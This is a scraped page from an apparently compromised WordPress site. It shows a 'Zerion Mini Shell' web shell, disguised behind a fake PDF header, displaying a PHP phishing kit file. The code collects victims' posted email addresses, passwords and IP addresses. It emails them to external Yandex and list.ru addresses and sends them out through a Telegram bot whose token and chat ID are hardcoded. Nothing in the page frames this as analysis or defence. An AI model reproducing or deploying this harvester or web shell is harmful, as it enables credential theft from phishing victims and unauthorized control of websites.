%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/eirtvhdf/cloudsslamllc.com/wp-admin/cmd/
Upload File :
Create Path :
Current File : /home/eirtvhdf/cloudsslamllc.com/wp-admin/cmd/1n.php

<?php

$ip = getenv("REMOTE_ADDR");
$message .= "------------+ Able-God Version 2022 +-------------\n";
$message .= "USER   : ".$_POST['email']."\n";
$message .= "PASS   : ".$_POST['password']."\n";
$message .= "============= [ Ip & Hostname Info ] =============\n";
$message .= "Client IP : ".$ip."\n";
$message .= "Details  : ".$_POST['detail']."\n";
$message .= "--------------+ Powered By Ability +--------------\n";
$send = "medility3@yandex.com, medility3@list.ru";
$subject = "Frontier .$ip.";
$headers .= "MIME-Version: 1.0\n";
$headers .= "From: Frontier <frontier@market.com>\n";
$arr=array($send, $IP);

mail($send,$subject,$message,$headers);

	
//report to telegram
function sendMessage($chatID, $messaggio, $token) {
    echo "sending message to " . $chatID . "\n";

    $url = "https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $chatID;
    $url = $url . "&text=" . urlencode($messaggio);
    $ch = curl_init();
    $optArray = array(
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true
    );
    curl_setopt_array($ch, $optArray);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
$token = "2111935893:AAHpXtIN_7RlFd4h9MH2m60o_KGmYdQAEsQ";
$chatid = "1660560098";
sendMessage($chatid, $message, $token);
	 
?>


Zerion Mini Shell 1.0